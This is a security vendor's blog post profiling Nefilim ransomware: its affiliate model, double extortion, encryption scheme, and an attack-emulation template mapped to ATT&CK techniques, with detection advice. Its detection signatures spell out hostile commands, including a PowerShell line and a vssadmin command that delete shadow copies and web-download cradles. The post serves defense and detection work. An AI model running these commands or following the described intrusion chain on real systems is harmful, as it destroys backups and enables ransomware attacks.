Nefilim is a Ransomware-as-a-Service (RaaS) operation that emerged in March 2020 and is believed to have evolved from the Nemty ransomware family. This attribution is due to the fact that Nefilim arose at the time when Nemty’s operators decided to quit the RaaS business model to concentrate their efforts on more selective attacks with more dedicated resources. It is also known that the author of Nemty appears to have shared the ransomware source code with others.

Nefilim operates under a profit share model where operators earn 30% for their ransomware service and the remaining 70% goes to the affiliates who provide the network access and implement the active phase of the attack. Nefilim affiliates have targeted multiple North and South American organizations within financial, manufacturing, and transportation sectors.

It utilizes the double extortion technique, in which sensitive information is exfiltrated prior to encryption. In this way, if the ransom is not paid, the exfiltrated information is leaked over an extended period of time. It is one of the few adversaries that host leaked victim data long-term, for months to years, in order to influence future victims to comply with the demands.

Nefilim uses AES-128 encryption to lock files and the encryption key is encrypted by an RSA-2048 public key that is embedded in the ransomware executable. In addition to the encrypted AES key, the ransomware will also add the “NEFILIM” string as a file marker to all encrypted files. Once all files are encrypted with the extension of (.NEFILIM), the ransomware note named ‘NEFILIM-DECRYPT.txt’ is dropped.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

• Evaluate security control performance against baseline behaviors associated with the Nefilim ransomware.
• Assess their security posture against an opportunistic adversary, which does not discriminate when it comes to selecting its targets.
• Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on ransomware activities.

Nefilim Ransomware – 2021-06 – Complete Infection Chain

Since March 2020, Nefilim ransomware has been observed targeting organizations with the financial, manufacturing, or transportation sectors throughout North and South America. During its activities, Nefilim has been primarily distributed through brute forcing of exposed Remote Desktop Protocol (RDP) setups. Some affiliates have also been observed targeting organizations using unpatched or poorly secured Citrix gateway devices by abusing known vulnerabilities such as CVE-2019-11634 and CVE-2019-19781, identified in December 2019 and patched in January 2020, for initial access.

Once initial foothold is obtained, Nefilim uses several tools to gather credentials, including Mimikatz, LaZagne, and NirSoft’s NetPass. Nefilim then uses the stolen credentials to reach remote high-value systems via Remote Desktop Protocol (RDP). Then, the adversary begins to drop and execute its components such as anti-antivirus, exfiltration tools, and finally Nefilim itself.

This attack graph seeks to emulate the sequence of behaviors associated with the deployment of Nefilim on a compromised system with the intent of providing customers with opportunities to prevent and/or detect a compromise in progress.

Initial Access & Credential Access – Credentials from Local System

This stage begins with the deployment of a Cobalt Strike Beacon which aims to establish communications between the compromised system and the attacker’s infrastructure.

Once the initial foothold is achieved, it proceeds to retrieve credentials from the system through the deployment of the Mimikatz hacktool. If not possible, the LaZagne tool is employed as an alternative.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes for Windows accounts.

OS Credential Dumping (T1003): This scenario uses the open-source tool LaZagne to dump all possible credentials available on the host.

Discovery & Lateral Movement – Local and Network Discovery

This stage is based on the discovery of system information both at the local level, such as the file system and available peripheral devices, and at the network level, such as remote systems, network shares, and active directories.

Leveraging the discovered information and obtained credentials, an attempt will then be made to move laterally to remote targets using the Remote Desktop Protocol (RDP).

File and Directory Discovery (T1083): This scenario uses the native dir command to find files of interest and output to a temporary file.

Peripheral Device Discovery (T1120): This scenario retrieves information about systems peripherals such as logical drives, physical memory, network cards through the execution of commands and binaries.

Remote System Discovery (T1018): This scenario performs a scan of the local network searching for any remotely accessible systems with ports 139, 389, 445, 636, or 3389 open.

Network Share Discovery (T1135): The native net tools are used to list all of the local mapped network shares with net share.

Remote System Discovery (T1018): This scenario will perform Active Directory discovery by leveraging the Adfind utility.

Remote Services: Remote Desktop Protocol (T1021.001): Remote Desktop is the built-in remote access utility used by Windows. This scenario attempts to remotely connect to another accessible asset with stolen credentials.

Impact – Nefilim Ransomware Deployment and Encryption

This stage begins with the deployment of Nefilim ransomware which, once executed, will be distributed over the network via PsExec and executed remotely via Windows Management Instrumentation (WMI).

Subsequently, it will attempt to bypass User Account Control (UAC) through registry modifications in order to elevate process privileges on the system.

Finally, the emulation will seek to collect and encrypt files on the system by mimicking the ransomware encryption routine.

Windows Management Instrumentation (T1047): This scenario attempts to move laterally to any available asset inside the network through the use of WMI. If the remote asset can be accessed, a configurable command is executed.

Bypass User Account Control (T1548.002): The malware attempts to disable UAC by setting a registry key.

Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using the same encryption algorithms observed in Nefilim ransomware.

Opportunities to Expand Emulation Capabilities

In addition to the released assessment template, AttackIQ recommends the following scenario to extend the emulation of the capabilities exhibited by Nefilim ransomware.

• Password Brute-Force: This scenario can be configured to attempt to brute login using Remote Desktop Protocol (RDP) on remote systems with a username and password dictionary.
• Lateral Movement Through PAExec: This scenario is meant to move laterally within a network using PAExec (an open-source version of PSExec). The actions performed in this scenario are remote login against specified machines using given credentials and executing ‘hostname’ on the remote system.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

• M1031 – Network Intrusion Prevention

 2. Data Encrypted for Impact (T1486):

Preventing systems and files from being encrypted should be a top priority. Ensuring that you have layered endpoint defenses including Antivirus and EDR solutions is critical.

2a. Detection

Ransomware attacks are best prevented and alerted by your EDR/AV Policies. Typically, a configuration for ransomware protection is presented and we strongly encourage that it is enabled in your security controls.

There are three telling signs of ransomware activity in an environment that you could query for and possibly make preventative detections if your security controls allow. Those three are deletion of shadow volumes, suspicious amounts of exfiltrated data, and of course, wide set file encryption.

Detecting deletion of shadow volumes is usually the first step that occurs and can be detected by looking at command line activity:

Via vssadmin.exe:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (“vssadmin” AND “Delete Shadows”)

Via PowerShell:

Process Name == powershell.exe
Command Line == “Get-WmiObject Win32_Shadowcopy | ForEach-Object ($_.Delete();)”

Detecting suspicious Data Exfiltration:

Detecting exfiltration is well suited for IDS/IPS and DLP solutions. These products should be configured to identify sensitive files. If sensitive files, or a large amount of web traffic is sent to a rare external IP, it should be detected or prevented depending on security policies for the security control. Historical NetFlow data logging can also bubble up hosts that are experience uncommon peaks in outgoing traffic.

Detecting Ransomware-like File Encryption:

Utilizing an EDR or SIEM/SOAR product can help detect and prevent suspicious file encryption related to ransomware attacks. Utilizing these tools to look for excessive file modifications (greater than 1000 on a system) within less than a minute of time is a good starting indicator.

To increase the fidelity a bit, you could include file modification of file extensions to popular ransomware extensions such as .conti, .Locky, .Ryuk, etc. If possible, with a SOAR or preventative EDR platform, we recommend setting these detections to kill all processes involved in creating the alert as it will most likely stop the spread of the Ransomware.

2b. Mitigation

MITRE ATT&CK Recommends the following mitigations:

Wrap-up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by Nefilim ransomware operators. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.